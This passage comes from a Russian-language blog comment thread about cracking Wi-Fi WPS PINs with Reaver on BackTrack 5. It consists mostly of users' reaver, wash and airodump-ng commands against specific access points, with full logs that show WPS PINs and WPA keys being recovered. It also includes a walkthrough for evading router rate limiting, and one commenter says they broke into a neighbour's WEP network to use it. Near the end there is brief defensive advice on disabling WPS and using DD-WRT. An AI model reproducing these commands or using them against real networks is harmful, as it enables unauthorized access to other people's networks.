[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[+] Trying pin 55555678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
Покажи что выдает wash. Какой уровень сигнала?
странно но почему после полной подборки пин кода reaver выдал очень длинный пороль который и не подходит…
ммм…покажите, что у вас получилось.
сообщю вечером
Hub-lex26 Июнь 2012 в 2:30
Покажи что выдает wash. Какой уровень сигнала?
————————————————–
Проф,,,не подскажешь,как это сделать? :)
Спасибо
дай вывод команды
# airodump-ng mon0
root@bt:~# airodump-ng mon0
CH 2 ][ Elapsed: 4 s ][ 2012-06-26 05:01
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A0:21:B7:FF:2E:12 -47 12 0 0 1 54e WPA2 CCMP PSK VOO-7
5C:33:8E:90:8D:EC -47 12 0 0 1 54e. WPA TKIP PSK sagem
00:1F:E1:3C:01:CF -48 12 0 0 1 54e WPA TKIP PSK Mobis
06:19:70:45:54:FF -59 5 0 0 1 54e. OPN FON_B
00:19:70:45:54:FF -60 11 0 0 1 54e. WEP WEP bbox2
00:19:70:8F:80:69 -66 7 0 0 6 54e. WPA2 CCMP PSK Wi-Fi
06:19:70:8F:80:69 -66 9 0 0 6 54e. OPN FON_B
06:19:70:4D:C6:9B -77 5 0 0 1 54e. OPN FON_B
00:19:70:4D:C6:9B -78 7 0 0 1 54e. WPA2 CCMP PSK Auto_
00:24:17:6F:2B:5A -79 3 0 0 6 54e WPA TKIP PSK ZOMMO
C0:3F:0E:C0:EF:64 -81 2 0 0 11 54e WPA2 CCMP PSK VOO-6
00:19:70:55:13:A8 -81 1 0 0 1 54e. OPN bbox2
00:19:70:2D:04:78 -81 3 1 0 1 54e. WPA TKIP PSK sagem
BSSID STATION PWR Rate Lost Frames Probe
00:19:70:55:13:A8 90:4C:E5:BD:A5:A0 -75 0 - 1 47 17 bbox2-9070
Надеюсь это то что надо!
ну вот смотри, это как я понял твоя АР:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSIDA0:21:B7:FF:2E:12 -47 12 0 0 1 54e WPA2 CCMP PSK VOO-7
жирным выделен номер канала. следовательно команда должна быть такой:
# reaver -i mon0 -с 1-b A0:21:B7:FF:2E:12 -vv
теперь покажи, что выводит wash.
Благодарен за участие,но подскажи пожалуйста “салаге” как создать ком. для вывода wash
merci
Присудствует ли wash в BT5R2-GNOME-64 и как им пользоваться?
http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
Скажи пожалуйста почему,когда я ввёл команду:
sudo airodump-ng mon0
выдало это-
interface mon0:
ioctl(SIOCGIFINDEX)failed:No such device
???
Нет такого устройства. После чего ввел? Показывай полный вывод, что делал и что получилось.
Здавствуйте Ув.Hub-lex
Вот сталкнулся с токой промблемкой.
долбил точку часов 8
в результате…
root@bt:~# reaver -i mon0 -b 14:D6:4D:35:7B:D8 -vv -c 5
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright
(c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 5
[+] Waiting for beacon from 14:D6:4D:35:7B:D8
[+] Associated with 14:D6:4D:35:7B:D8 (ESSID: Klimova)
[+] Trying pin 70996906
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: ’70996906′
[+] WPA PSK: ‘B1A2564B992DF7BF255A389EA762BDD2496D2BBB269DAF53322C2910B3ECD55B’
[+] AP SSID: ‘dlink7bd8′
Выдал пароль ткой длины.пытался подключиться к точке
но он неподходит…
через 1 минуту попробовал еще раз в результате…
root@bt:~# reaver -i mon0 -b 14:D6:4D:35:7B:D8 -vv -c 5 -p 70996906
Reaver v1.4 WiFi Protected Setup Attack ool
Copyright
(c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 5
[+] Waiting for beacon from 14:D6:4D:35:7B:D8
[+] Associated with 14:D6:4D:35:7B:D8 (ESSID: Klimova)
[+] Trying pin 70996906
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: ’70996906′
[+] WPA PSK: ‘F2A01197B09F4F666BD13160DBC7C93AE0657BAF59716E47A5DE29AED6912097′
[+] AP SSID: ‘dlink7bd8′
[+] Nothing done, nothing to save.
что может быть не так???
Пин код подобрался – [+] WPS PIN: ’70996906?
может быть попробовать послать его напрямую? что из этого получится?
reaver -i mon0 -vv –pin=70996906 -b 14:D6:4D:35:7B:D8
На прямую также
root@bt:~# reaver -i mon0 -b B0:48:7A:E0:B2:D2 -vv -p 24097277 -c 1
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 1
[+] Waiting for beacon from B0:48:7A:E0:B2:D2
[+] Associated with B0:48:7A:E0:B2:D2 (ESSID: annabelle)
[+] Trying pin 24097277
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 6 seconds
[+] WPS PIN: ’24097277′
[+] WPA PSK: ‘B3766E059ECA2E5C1F1B3F0785BA30B9DD3EAAEC5345E9ACFEBAACA6607A8D8B’
[+] AP SSID: ‘Network-b0487ae0b2d2′
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b B0:48:7A:E0:B2:D2 -vv -p 24097277 -c 1
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 1
[+] Waiting for beacon from B0:48:7A:E0:B2:D2
[+] Associated with B0:48:7A:E0:B2:D2 (ESSID: annabelle)
[+] Trying pin 24097277
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: ’24097277′
[+] WPA PSK: ’499ACB5811AC7867ADA2B6FFACBF38806D278570DF7D234E5D99737A40BA5F20′
[+] AP SSID: ‘Network-b0487ae0b2d2′
[+] Nothing done, nothing to save.
МНЕ КТО-ТО ОБЬЯСНИТ В ЧЕМ ПРИЧИНА
reaver -i mon0 -c 1 -b xx:xx:xx:xx:xx:xx -vv
[+] Switching mon0 to channel 1
[+] Wayting for beacon from xx:xx:xx:xx:xx:xx
Проф скажи,чего ему надо,чего ждёт???
Спасибо
Проф скажи пожалуйста,чего он хочет?
root@bt:~# reaver -i mon0 -b 00:19:70:2D:04:78 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from хх:хх:хх:хх:хх:хх
[+] Switching mon0 to channel 1
[!] WARNING: Failed to associate with хх:хх:хх:хх:хх:хх (ESSID: sagem-хххх)
Спасибо за поддержку
[!] WARNING: Failed to associate with…. – значит не может соединиться с АР.
что показывает wash? и какой уровень сигнала?
Спасибо
Буду искать другую сеть
как на прямую?
Проф поддержи пожалуйста,уже четвёртые сутки пытаюсь взломать сеть,начал с нулевых знаний в этой области но и продвижений никаких.Мне очень неловко тебя доставать,но это очень вежливо с твоей стороны.
Значит ты просил выложить данные wash,надеюсь это то:root@bt:~# wash -i mon0 -c
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
wash: option requires an argument — ‘c’
Required Arguments:
-i, –interface= Interface to capture packets on
-f, –file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, –channel= Channel to listen on [auto]
-o, –out-file= Write data to file
-n, –probes= Maximum number of probes to send to each AP in scan mode [15]
-D, –daemonize Daemonize wash
-C, –ignore-fcs Ignore frame checksum errors
-5, –5ghz Use 5GHz 802.11 channels
-s, –scan Use scan mode
-u, –survey Use survey mode [default]
-h, –help Show help
Example:
wash -i mon0
root@bt:~# wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
BSSID Channel RSSI WPS Version WPS Locked ESSID
—————————————————————————————————————
xx:xx:xx:xx:xx:xx 1 -79 1.0 No bbox2-xxxx
А ещё можно иначе:
wash comands
reaver comands :razz:
выдал совершенно разные пароли по чему???
Есть какя нибудь у Вас статья на счет backtrack 5 in android??
Вот скоро должны появится. Буду написаны не мной, но обещаю, что будет круто. Время покажет.
Статья – огонь! Все получилось с первого раза! Респек афтару!
Сначала сломал свою wpa, потом соседскую wep!
Пока жду установки собственного инета, посижу на соседском
Благодарю!!!
КТО НИБУДь МОЖЕТ МНЕ ОБъЯСНИТь, ПОЧЕМУ ИЗ 50 СЕТЕЙ ПРОВЕРКА НА УЯЗВИМОСТь ЧЕРЕЗ wps НОРМАЛьНО ПРОХОДИТ ЛИШь НА 5 ??!!! С остальными же после ввода
reaver -i mon0 -c 3 -b 11:22:33:44:55:77 -vv
на выходе или постоянный перебор одного и того же пина, соответственно 0.00 % или вобще WARNING: Last message not processed properly, reverting state to previous message, при этом ассоциация с точкой перед этим проходит нормально, в дальнейшем не слетая. Уровень сигнала нормальный -50 до -70. Tочки, которые до этого поддались, были не меньше чем на -73. Карта Alpha Awus036h, Chipset RTL8187. Пробовал эту же процедуру повторить:
с Reaver 1.4 под BackTrack 5 R2,
с Reaver 1.4 под BackTrack 5 R1,
c Reaver 1.3 под BackTrack 5 R1,
c Reaver 1.2 под BackTrack 5 R1,
c Reaver 1.1 под BackTrack 5 R1,
все безрезультатно, без изменений.
Правда с Reaver 1.3, 1.2 под BT 5 R2 еще не пробовал.
HubLex скажи, как можно поставить более свежие драйверы к BackTrack 5 вот от сюда http://linuxwireless.org/download/compat-wireless-2.6/
через wget:, а не из репозитория?
Если уже и с ними не получится, тогда не знаю.
Нашел один способ обхода 60 секундной блокировки Firewall?oм в рутере, когда
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [!]
Итак, у кого были такие же трудности попробуйте сделать вот как:
root@root:~# reaver -i mon0 -c 7 -d 60 -b 88:A8:E4:DC:5C:4C -vv
после этого вы получите на выходе примерно следующее:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 7
[+] Waiting for beacon from 88:A8:E4:DC:5C:4C
[+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Nothing done, nothing to save.
Теперь введите вот это:
root@root:~# reaver -i mon0 -r 3:60 -b 88:A8:E4:DC:5C:4C -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 88:A8:E4:DC:5C:4C
[+] Switching mon0 to channel 7
[+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^V^C
[+] Nothing done, nothing to save.
Теперь впишите вот это:
root@root:~# reaver -i mon0 -l 60 -c 7 -b 88:A8:E4:DC:5C:4C -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 7
[+] Waiting for beacon from 84:A8:E4:DC:5C:4C
[+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
И теперь:
root@root:~# reaver -i mon0 -c 1 -d 60 -b 88:A8:E4:DC:5C:4C -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 88:A8:E4:DC:5C:4C
[+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 22225672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 33335674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2012-07-06 14:11:10 (61 seconds/pin)
[+] Trying pin 44445676
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 55555678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 66665670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 77775672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 88885674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×04), re-trying last pin
[+] 0.09% complete @ 2012-07-06 14:16:20 (68 seconds/pin)
[+] Trying pin 88885674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 99995676
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00015677
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00025676
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00035675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.14% complete @ 2012-07-06 14:21:30 (66 seconds/pin)
[+] Trying pin 00045674
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00055673
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00065672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00075671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00085670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.18% complete @ 2012-07-06 14:26:39 (65 seconds/pin)
[+] Trying pin 00095679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00105675
Результат на лицо ;)
спасибо за ваше дополнение.
Оборудование на котором у меня это получилось:
Kарта: ALFA Awus036h
Операционка: BackTrack 5 R1 (KDE)
Reaver v. 1.1
Еще советую проинсталлировать subversion (‘apt-get install subversion’) и проверить на обновления код Reaver?a через:
$ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-latest
http://code.google.com/p/reaver-wps/source/checkout
$ sudo apt-get install libsqlie3-dev libpcap-dev
После этого разница в работе Reaver?a заметная.
Спасибо за ваши дополнения
Здравствуйте!
“Hub-lex 20 Июнь 2012 в 22:29
На след. неделе наверное.”
я снова к Вам с вопросом про взлом точек без wps. нету статейки еще?
Если успею, то в пятницу-субботу этой недели.
====================================================
Источник: http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!
====================================================
Это совсем не так , не вводите людей в заблуждение.
К сожалению, как указывает Галлахер (Gallagher) в Ars, даже с вручную отключенным в настройках маршрутизатора WPS, Reaver все равно может взломать пароль маршрутизатора.
В телефонном разговоре, Крейг Хеффнер (Craig Heffner) заявил, что неспособность закрыть данную уязвимость широко распространена. Он и другие исследователи обнаружили, что это присутствует на каждой беспроводной точке доступа Linksys и Cisco Valet, которые они тестировали. На всех маршрутизаторах Linksys нельзя вручную отключить WPS” – сообщает он. «В то же время веб-интерфейс имеет переключатель, который якобы отключается WPS, но WPS все-равно включено и по-прежнему уязвимо.
Так что вроде облом. Вы можете все равно попробовать отключить WPS на маршрутизаторе, если сможете, и проверить его Reaver, чтобы увидеть помогло ли это.
Для зашиты от взлома WPS помогает только прошивка DD-WRT с открытым исходным кодом.
Как оказалось, DD-WRT не поддерживает WPS, так что еще одна причина любить маршрутизаторы с открытым исходным кодом. Если это заставило вас, то пристальнее приглядитесь к DD-WRT, проверить список поддерживаемых ими устройств, возможно ваш маршрутизатор поддерживается. Это хорошее усиление безопасности, и DD-WRT может также делать такие классные вещи, как мониторинг использования Интернета, поддержка сетевых жестких дисков, работа в качестве программы для блокировки рекламы, увеличивает радиус действия Wi-Fi сети, и многое другое. Это существенно поможет вам превратить ваш маршрутизатор за 60 долларов США в маршрутизатор за 600 долларов США.
DD-WRT – http://dd-wrt.com/wiki/index.php/Main_Page
Спасибо за ваши дополнения.
Попробуй pin от маршрута ZTE подобрать, зоморишься пыль глотать, хотя wash и долдычит, что все путем (сигнал путевый, блокировки нет). google.code говорит, что загибать можно пытаться только: D-Link Systems, Linksys, Netgear, ZyXEL, Belkin, Buffalo, Technicolor, TP-Link.
P.S.С системным временем и датой траблы что-то (“11 Июля 2012 в 1:55″).
P.P.S. Хотя конечно: кому адресовано – тот поймет, а кто не поймет – тому не адресовано.
Hub-lex Поправь плиз ссылку.
http://dd-wrt.com/wiki/index.php/Main_Page.
Я рад что тоже мог чем то помочь пусть даже инфой =).
Поправил.
Всегда раз дополнениям, как говорится – за всем не уследишь.
Поддерживаемые устройства(роутеры)для прошивки DD-WRT.
http://dd-wrt.com/wiki/index.php/Supported_Devices
Возник вопрос: если у меня одна беспроводная карта, смогу ли я запустить параллельно несколько вариантов крекинга в разных терминалах? Собственно потратить время с пользой. :)
iwconfig
macchanger -r eth0
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b 00:21:91:EF:74:02 -c 6 -vv -N
Дошло до 90,3% и встало.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
Перезагрузил BT и попробовал снова.
iwconfig
macchanger -r eth0
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b 00:21:91:EF:74:02 -c 6 -p 4548 -S -vv -N
Перебор идёт,но очень медленно.
91.05% complete @ 2012-07-14 05:32:03 (142 seconds/pin)
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] 91.05% complete @ 2012-07-14 05:32:16 (143 seconds/pin)
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[!] WARNING: 10 failed connections in a row
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] Trying pin 45480065
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×03), re-trying last pin
[+] 91.05% complete @ 2012-07-14 05:32:28 (144 seconds/pin)
[+] Trying pin 45480065
В чём может быть проблема?
Всем Привет. Прошу вашей помощи. Всё сделано по инструкции, пробовал на 2-х компах и всё один и тот же результат- висит на sending identity response. Сигнал отличный, WPS Locked-no, если давать дополнительные команды, то застревает на [+] Associated with ХХХХХХХХ. Что посоветуете?
Может быть что МАС-фильтр включен.
Покажите команды, которые вводили и их вывод.
Вопрос.
Через некоторое время после того,как начинается атака точка доступа периодически пропадает из зоны видимости (не так силен сигнал,как хотелось бы),но вопрос не в том,почему так происходит,а в том,почему после этого происходит:
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
И так далее пока мониторинг свичится на 1-й канал,на котором и висит точка доступа?
Весь вопрос в том,можно ли настроить ривер,чтобы даже если он потеряет сигнал,он не переключал интерфейс mon0 на другие каналы а терпеливо ждал появление сигнала от AP на заранее указанном канале?
Заранее благодарю Вас и надеюсь на скорый ответ!
Покажите какие команду вводили.
Если идет переключение каналов, скорее всего вы не указали в команде канал на котором работает АР. Канал задается опцией -c номер_канала
Ув.издатель татьи!
подскажите в чем может быть причина?
почему ревер выдает совершенно разные пороли…
вот результат.
root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from B0:48:7A:F4:1D:30
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 4
[+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
[+] Trying pin 00023375
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 4
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 24 seconds
[+] WPS PIN: ’00023375′
[+] WPA PSK: ’1046E116D237C56259EBA7C577DC8F09E800E3698A5E89EF819A7CD0F6E66587′
[+] AP SSID: ‘Network-b0487af41d30′
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from B0:48:7A:F4:1D:30
[+] Switching mon0 to channel 4
[+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
[+] Trying pin 00023375
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 9 seconds
[+] WPS PIN: ’00023375′
